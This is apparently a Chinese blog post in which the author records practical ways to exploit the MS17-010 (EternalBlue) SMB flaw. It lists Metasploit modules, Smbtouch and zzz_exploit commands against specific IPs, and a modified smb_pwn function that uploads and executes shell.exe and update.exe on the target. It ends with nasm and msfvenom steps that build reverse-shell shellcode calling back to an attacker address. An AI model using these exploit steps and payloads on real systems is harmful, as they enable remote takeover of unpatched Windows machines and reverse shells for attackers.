目录
讲在前面
此文笔者记录自己利用MS17-010漏洞时的几种方法。工具可以评论笔者获取
MSF
MSF利用模块
exploit/windows/smb/ms17_010_eternalblue
auxiliary/admin/smb/ms17_010_command
auxiliary/scanner/smb/smb_ms17_010
exploit/windows/smb/ms17_010_eternalblue_win8
exploit/windows/smb/ms17_010_psexec
exploit/windows/smb/smb_doublepulsar_rce
Smbtouch
运行smbtouch.exe工具目标机器是否存在其他payload可以攻击,工具只支持对2012以下的机器使用
Smbtouch-1.1.1.exe --TargetIp 172.16.94.189 --TargetPort 445
zzz_exploit.py
打包exe使用
示例:zzz_exploit.exe <ip> <exe-parameter> [pipe_name]
示例:zzz_exploit.exe 172.16.94.211
示例:zzz_exploit.exe 172.16.94.211 sc.exe
示例:实战命令为 zzz_exploit.exe 192.11.22.82 -Start
python利用
python zzz_exploit.py 172.16.94.211
检查name-pipe
python checker.py 172.16.94.211
注意:脚本默认为exploit8攻击模块,需要打win7pc版将脚本内smb_pw函数替换为如下函数
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe')
service_exec(conn, r'cmd /c c:\\shell.exe')
smb_send_file(smbConn, '/tmp/1.exe', 'C', 'users/public/update.exe')
service_exec(conn, r'cmd /c c:\\users\\public\\update.exe')
shellcode
x64
如果是用x64的payload,cs生成时一定要选择x64的版本,否则会直接重启
x64
$ nasm -f bin ./eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x64 --format raw -o sc_x64_payload.bin
$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
x86
$ nasm -f bin ./eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x86 --format raw -o sc_x86_payload.bin
$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
$ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin